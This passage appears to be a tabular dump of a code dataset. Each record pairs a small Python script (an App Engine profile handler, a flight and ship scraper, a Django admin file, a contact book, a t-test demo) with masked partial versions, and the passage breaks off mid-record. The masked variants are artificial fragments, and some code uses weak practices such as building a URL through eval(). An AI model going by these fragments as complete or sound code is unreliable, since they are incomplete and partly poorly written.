code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
from google.appengine.api import users
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
import os
import logging
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class UserProfile(ndb.Model):
"""Models the profile (JSON) of an individual user."""
profile = ndb.TextProperty()
date = ndb.DateTimeProperty(auto_now_add=True)
@classmethod
def query_profile(cls, ancestor_key):
return cls.query(ancestor=ancestor_key).get()
class UserProfileHandler(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('templates/profile.html')
the_user = self.request.get('user')
logging.info("The user = " + the_user)
if the_user == "":
the_user = users.get_current_user().email()
owner = True
else:
owner = False
user_profile_data = UserProfile.get_by_id(the_user)
template_values = { 'owner': owner, 'user': the_user}
if user_profile_data:
template_values['profile_data'] = user_profile_data.profile
logging.info(user_profile_data)
self.response.out.write(template.render(template_values))
def post(self):
user = users.get_current_user()
profile_data = self.request.get('profile_data')
user_profile = UserProfile(id=user.email(), profile=profile_data)
user_profile.put()
self.redirect('/profile')
#self.response.out.write("Here is the JSON for your profile.")
#self.response.out.write(profile_data)
app = webapp2.WSGIApplication([
('/profile', UserProfileHandler),
], debug=True)
|
normal
|
{
"blob_id": "309090167c2218c89494ce17f7a25bd89320a202",
"index": 3855,
"step-1": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-3": "<mask token>\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-4": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\nimport webapp2\nimport jinja2\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-5": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\n\nimport webapp2\nimport jinja2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\nclass UserProfileHandler(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info(\"The user = \" + the_user)\n if the_user == \"\":\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = { 'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n #self.response.out.write(\"Here is the JSON for your profile.\")\n #self.response.out.write(profile_data)\n\napp = webapp2.WSGIApplication([\n ('/profile', UserProfileHandler),\n], debug=True)\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
#!/usr/bin/python
import os
# http://stackoverflow.com/questions/4500564/directory-listing-based-on-time
def sorted_ls(path):
mtime = lambda f: os.stat(os.path.join(path, f)).st_mtime
return list(sorted(os.listdir(path), key=mtime))
def main():
print "Content-type: text/html\n\n"
print "<html><head><title>title</title></head>"
print "<body>"
path='../html/biasframes/'
# print '<img width=100% src=\"../biasframes/'+file+'\" alt=\"'+file+'\" /><br>'
files = sorted_ls(path)
files.reverse()
# print files
nfiles=0
for file in files:
print '<img width=100% src=\"../biasframes/'+file+'\" alt=\"'+file+'\" /><br>'
nfiles+=1
if nfiles>24:
break
print "</body>"
print "</html>"
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "f4715a1f59ceba85d95223ef59003410e35bfb7f",
"index": 4037,
"step-1": "#!/usr/bin/python\nimport os\n\n# http://stackoverflow.com/questions/4500564/directory-listing-based-on-time\ndef sorted_ls(path):\n mtime = lambda f: os.stat(os.path.join(path, f)).st_mtime\n return list(sorted(os.listdir(path), key=mtime))\n\ndef main():\n print \"Content-type: text/html\\n\\n\"\n print \"<html><head><title>title</title></head>\"\n print \"<body>\"\n\n path='../html/biasframes/'\n # print '<img width=100% src=\\\"../biasframes/'+file+'\\\" alt=\\\"'+file+'\\\" /><br>'\n\n files = sorted_ls(path)\n files.reverse()\n # print files\n\n nfiles=0\n for file in files:\n print '<img width=100% src=\\\"../biasframes/'+file+'\\\" alt=\\\"'+file+'\\\" /><br>'\n nfiles+=1\n if nfiles>24:\n break\n\n print \"</body>\"\n print \"</html>\"\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from selenium import webdriver
from urllib.request import urlopen, Request
from subprocess import check_output
import json
#from flask import Flask
# https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds=-32.27,-34.08,-73.15,-70.29
def get_json_aviones(north, south, west, east):
#driver = webdriver.Chrome('/Users/luisl/Desktop/Pega Altavoz/chromedriver')
driver = webdriver.PhantomJS("phantomjs")
# Mala práctica de programación
eval("driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))")
json_aviones = json.loads(driver.find_element_by_tag_name("pre").text)
driver.close()
return json_aviones
#######################
def get_json_buques(centerx, centery, zoom):
## PRUEBA 1 - Mezclar con phantomjs
count = 0
while True:
ignore = False
count += 1
print(centerx, centery, zoom)
out = check_output(["phantomjs", "GetBarcos.js", str(centerx), str(centery), str(zoom)])
links = json.loads(out)
if links[0] != 0:
break
else:
print("get_json_buques FAILED -------------- trying again")
if count == 5:
ignore = True
break
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'vessel-image': '00853fc25189416456442da74396a0288d02',
'x-requested-with': 'XMLHttpRequest'}
webpage = []
for link in links:
if not ignore:
req = Request(link, headers=headers)
webpage.extend(json.loads(urlopen(req).read().decode())['data']['rows'])
## try:
## with open("data", "w") as file:
## file.write(json.dumps(webpage[0]))
## except Exception as e:
## print(e)
return webpage
#######################
#app = Flask(__name__)
#
#
#@app.route('/')
# def hello_world():
# return json.dumps({'aviones': get_json_aviones(),
# 'buques': get_json_buques()})
#
#
#t = Timer(10.0, hello_world)
# t.start()
if __name__ == "__main__":
get_json_buques(-71, -33, 9)
# get_json_aviones(32.27, -34.08, -73.15, -70.29)
|
normal
|
{
"blob_id": "9ba5af7d2b6d4f61bb64a055efb15efa8e08d35c",
"index": 5379,
"step-1": "<mask token>\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_json_aviones(north, south, west, east):\n driver = webdriver.PhantomJS('phantomjs')\n eval(\n \"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\"\n )\n json_aviones = json.loads(driver.find_element_by_tag_name('pre').text)\n driver.close()\n return json_aviones\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_json_aviones(north, south, west, east):\n driver = webdriver.PhantomJS('phantomjs')\n eval(\n \"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\"\n )\n json_aviones = json.loads(driver.find_element_by_tag_name('pre').text)\n driver.close()\n return json_aviones\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\nif __name__ == '__main__':\n get_json_buques(-71, -33, 9)\n",
"step-4": "from selenium import webdriver\nfrom urllib.request import urlopen, Request\nfrom subprocess import check_output\nimport json\n\n\ndef get_json_aviones(north, south, west, east):\n driver = webdriver.PhantomJS('phantomjs')\n eval(\n \"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\"\n )\n json_aviones = json.loads(driver.find_element_by_tag_name('pre').text)\n driver.close()\n return json_aviones\n\n\ndef get_json_buques(centerx, centery, zoom):\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output(['phantomjs', 'GetBarcos.js', str(centerx), str(\n centery), str(zoom)])\n links = json.loads(out)\n if links[0] != 0:\n break\n else:\n print('get_json_buques FAILED -------------- trying again')\n if count == 5:\n ignore = True\n break\n headers = {'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n , 'Accept':\n 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n webpage = []\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']\n ['rows'])\n return webpage\n\n\nif __name__ == '__main__':\n get_json_buques(-71, -33, 9)\n",
"step-5": "from selenium import webdriver\nfrom urllib.request import urlopen, Request\nfrom subprocess import check_output\nimport json\n#from flask import Flask\n\n\n# https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds=-32.27,-34.08,-73.15,-70.29\ndef get_json_aviones(north, south, west, east):\n\n #driver = webdriver.Chrome('/Users/luisl/Desktop/Pega Altavoz/chromedriver')\n driver = webdriver.PhantomJS(\"phantomjs\")\n\n # Mala práctica de programación\n eval(\"driver.get('https://data-live.flightradar24.com/zones/fcgi/feed.js?bounds={},{},{},{}'.format(north, south, west, east))\")\n json_aviones = json.loads(driver.find_element_by_tag_name(\"pre\").text)\n\n driver.close()\n\n return json_aviones\n\n#######################\n\n\ndef get_json_buques(centerx, centery, zoom):\n\n ## PRUEBA 1 - Mezclar con phantomjs\n count = 0\n while True:\n ignore = False\n count += 1\n print(centerx, centery, zoom)\n out = check_output([\"phantomjs\", \"GetBarcos.js\", str(centerx), str(centery), str(zoom)])\n\n links = json.loads(out)\n\n if links[0] != 0:\n break\n\n else:\n print(\"get_json_buques FAILED -------------- trying again\")\n \n if count == 5:\n ignore = True\n break\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'vessel-image': '00853fc25189416456442da74396a0288d02',\n 'x-requested-with': 'XMLHttpRequest'}\n\n webpage = []\n\n for link in links:\n if not ignore:\n req = Request(link, headers=headers)\n webpage.extend(json.loads(urlopen(req).read().decode())['data']['rows'])\n\n ## try:\n ## with open(\"data\", \"w\") as file:\n ## file.write(json.dumps(webpage[0]))\n ## except Exception as e:\n ## print(e)\n\n return webpage\n\n#######################\n\n\n#app = Flask(__name__)\n#\n#\n#@app.route('/')\n# def hello_world():\n# return json.dumps({'aviones': 
get_json_aviones(),\n# 'buques': get_json_buques()})\n#\n#\n#t = Timer(10.0, hello_world)\n# t.start()\n\n\nif __name__ == \"__main__\":\n\n get_json_buques(-71, -33, 9)\n # get_json_aviones(32.27, -34.08, -73.15, -70.29)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.contrib import admin
from main.models import Assignment, Review, Sample, Question, SampleMultipleFile
# Register your models here.
admin.site.register(Assignment)
admin.site.register(Review)
admin.site.register(Question)
class MultipleFileInline(admin.TabularInline):
model = SampleMultipleFile
class SampleAdmin(admin.ModelAdmin):
inlines = [ MultipleFileInline ]
prepopulated_fields = {'slug': ('heading',)}
admin.site.register(Sample, SampleAdmin)
|
normal
|
{
"blob_id": "d18c45c08face08ce8f7dad915f1896c24c95cbf",
"index": 2991,
"step-1": "<mask token>\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MultipleFileInline(admin.TabularInline):\n model = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\n<mask token>\n",
"step-3": "<mask token>\nadmin.site.register(Assignment)\nadmin.site.register(Review)\nadmin.site.register(Question)\n\n\nclass MultipleFileInline(admin.TabularInline):\n model = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\nadmin.site.register(Sample, SampleAdmin)\n",
"step-4": "from django.contrib import admin\nfrom main.models import Assignment, Review, Sample, Question, SampleMultipleFile\nadmin.site.register(Assignment)\nadmin.site.register(Review)\nadmin.site.register(Question)\n\n\nclass MultipleFileInline(admin.TabularInline):\n model = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n inlines = [MultipleFileInline]\n prepopulated_fields = {'slug': ('heading',)}\n\n\nadmin.site.register(Sample, SampleAdmin)\n",
"step-5": "from django.contrib import admin\nfrom main.models import Assignment, Review, Sample, Question, SampleMultipleFile\n\n# Register your models here.\nadmin.site.register(Assignment)\nadmin.site.register(Review)\nadmin.site.register(Question)\n\n\nclass MultipleFileInline(admin.TabularInline):\n\tmodel = SampleMultipleFile\n\n\nclass SampleAdmin(admin.ModelAdmin):\n\tinlines = [ MultipleFileInline ]\n\tprepopulated_fields = {'slug': ('heading',)}\n\nadmin.site.register(Sample, SampleAdmin)",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
from ContactBook import ContactBook
import csv
def run():
contact_book = ContactBook()
with open("22_agenda/contactos.csv",'r') as f:
reader = csv.reader(f)
for idx,row in enumerate(reader):
if idx == 0:
continue
else:
contact_book.add(row[0],row[1],row[2])
while True:
comando = input('''
Que desea hacer
a. añadir contacto
b. actualizar contacto
c. buscar contacto
d. eliminar contacto
e. listar contacto
f. salir
: ''')
if comando == 'a':
print("añadir contacto")
nombre = input("Escribe el nombre de la persona: ")
telefono = input("Escribe el telefono de la persona: ")
email = input("ingrese el email de la persona: ")
contact_book.add(nombre,telefono,email)
elif comando == 'b':
print("actualizar contacto")
nombre = input("Escribe el nombre de la persona: ")
contact_book.update_menu(nombre)
elif comando == 'c':
print("buscar contacto")
nombre = input("Escribe el nombre de la persona: ")
contact_book.search(nombre)
elif comando == 'd':
print("eliminar contacto")
nombre = input("Escribe el nombre de la persona: ")
contact_book.delete(nombre)
elif comando == 'e':
print("listar contactos")
contact_book.show_all()
elif comando == 'f':
print("salir ")
break
else:
print("opcion no valida")
if __name__ == "__main__":
run()
|
normal
|
{
"blob_id": "f5831b84c1177d8b869db05d332bd364b3f72fff",
"index": 4282,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef run():\n contact_book = ContactBook()\n with open('22_agenda/contactos.csv', 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0], row[1], row[2])\n while True:\n comando = input(\n \"\"\"\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : \"\"\"\n )\n if comando == 'a':\n print('añadir contacto')\n nombre = input('Escribe el nombre de la persona: ')\n telefono = input('Escribe el telefono de la persona: ')\n email = input('ingrese el email de la persona: ')\n contact_book.add(nombre, telefono, email)\n elif comando == 'b':\n print('actualizar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.update_menu(nombre)\n elif comando == 'c':\n print('buscar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.search(nombre)\n elif comando == 'd':\n print('eliminar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.delete(nombre)\n elif comando == 'e':\n print('listar contactos')\n contact_book.show_all()\n elif comando == 'f':\n print('salir ')\n break\n else:\n print('opcion no valida')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef run():\n contact_book = ContactBook()\n with open('22_agenda/contactos.csv', 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0], row[1], row[2])\n while True:\n comando = input(\n \"\"\"\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : \"\"\"\n )\n if comando == 'a':\n print('añadir contacto')\n nombre = input('Escribe el nombre de la persona: ')\n telefono = input('Escribe el telefono de la persona: ')\n email = input('ingrese el email de la persona: ')\n contact_book.add(nombre, telefono, email)\n elif comando == 'b':\n print('actualizar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.update_menu(nombre)\n elif comando == 'c':\n print('buscar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.search(nombre)\n elif comando == 'd':\n print('eliminar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.delete(nombre)\n elif comando == 'e':\n print('listar contactos')\n contact_book.show_all()\n elif comando == 'f':\n print('salir ')\n break\n else:\n print('opcion no valida')\n\n\nif __name__ == '__main__':\n run()\n",
"step-4": "from ContactBook import ContactBook\nimport csv\n\n\ndef run():\n contact_book = ContactBook()\n with open('22_agenda/contactos.csv', 'r') as f:\n reader = csv.reader(f)\n for idx, row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0], row[1], row[2])\n while True:\n comando = input(\n \"\"\"\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : \"\"\"\n )\n if comando == 'a':\n print('añadir contacto')\n nombre = input('Escribe el nombre de la persona: ')\n telefono = input('Escribe el telefono de la persona: ')\n email = input('ingrese el email de la persona: ')\n contact_book.add(nombre, telefono, email)\n elif comando == 'b':\n print('actualizar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.update_menu(nombre)\n elif comando == 'c':\n print('buscar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.search(nombre)\n elif comando == 'd':\n print('eliminar contacto')\n nombre = input('Escribe el nombre de la persona: ')\n contact_book.delete(nombre)\n elif comando == 'e':\n print('listar contactos')\n contact_book.show_all()\n elif comando == 'f':\n print('salir ')\n break\n else:\n print('opcion no valida')\n\n\nif __name__ == '__main__':\n run()\n",
"step-5": "from ContactBook import ContactBook\nimport csv\n\ndef run(): \n\n contact_book = ContactBook()\n \n with open(\"22_agenda/contactos.csv\",'r') as f:\n reader = csv.reader(f)\n for idx,row in enumerate(reader):\n if idx == 0:\n continue\n else:\n contact_book.add(row[0],row[1],row[2])\n\n\n while True:\n comando = input('''\n Que desea hacer\n a. añadir contacto\n b. actualizar contacto\n c. buscar contacto\n d. eliminar contacto\n e. listar contacto\n f. salir \n : ''')\n\n if comando == 'a':\n print(\"añadir contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n telefono = input(\"Escribe el telefono de la persona: \")\n email = input(\"ingrese el email de la persona: \")\n\n contact_book.add(nombre,telefono,email)\n\n elif comando == 'b':\n print(\"actualizar contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n contact_book.update_menu(nombre)\n\n elif comando == 'c':\n print(\"buscar contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n contact_book.search(nombre)\n\n elif comando == 'd':\n print(\"eliminar contacto\")\n nombre = input(\"Escribe el nombre de la persona: \")\n contact_book.delete(nombre)\n\n elif comando == 'e':\n print(\"listar contactos\")\n contact_book.show_all()\n\n elif comando == 'f':\n print(\"salir \")\n break\n\n else:\n print(\"opcion no valida\")\n\nif __name__ == \"__main__\":\n run()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
from scipy import stats
a = np.random.normal(25.0, 5.0, 10000)
b = np.random.normal(26.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness
b = np.random.normal(25.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # no change, outcome is likely random
|
normal
|
{
"blob_id": "ba85f3c8a9e40f30076c13487a97567f7bc646dc",
"index": 8041,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(stats.ttest_ind(a, b))\n<mask token>\nprint(stats.ttest_ind(a, b))\n",
"step-3": "<mask token>\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-4": "import numpy as np\nfrom scipy import stats\na = np.random.normal(25.0, 5.0, 10000)\nb = np.random.normal(26.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\nb = np.random.normal(25.0, 5.0, 10000)\nprint(stats.ttest_ind(a, b))\n",
"step-5": "import numpy as np\r\nfrom scipy import stats\r\n\r\na = np.random.normal(25.0, 5.0, 10000)\r\nb = np.random.normal(26.0, 5.0, 10000)\r\n\r\nprint(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness\r\n\r\nb = np.random.normal(25.0, 5.0, 10000)\r\nprint(stats.ttest_ind(a, b)) # no change, outcome is likely random\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def sum_numbers(numbers=None):
sum = 0
if numbers == None:
for number in range(1, 101):
sum += number
return sum
for number in numbers:
sum += number
return sum
|
normal
|
{
"blob_id": "a85d06d72b053b0ef6cb6ec2ba465bfb8975b28e",
"index": 3879,
"step-1": "<mask token>\n",
"step-2": "def sum_numbers(numbers=None):\n sum = 0\n if numbers == None:\n for number in range(1, 101):\n sum += number\n return sum\n for number in numbers:\n sum += number\n return sum\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# All about users.
#
# author: [email protected]
#
from client import ClientHelper
from mongodb import MongoDBClient
class FixedData:
def get_data( self, id ):
data = self.get_data_from_mongodb( id )
if ( data ):
return data
else:
data = self.get_data_from_douban( id )
self.upsert_data_into_mongo( data )
|
normal
|
{
"blob_id": "b1530c664fa236e61ff50bca502bf79730c3386c",
"index": 6647,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass FixedData:\n <mask token>\n",
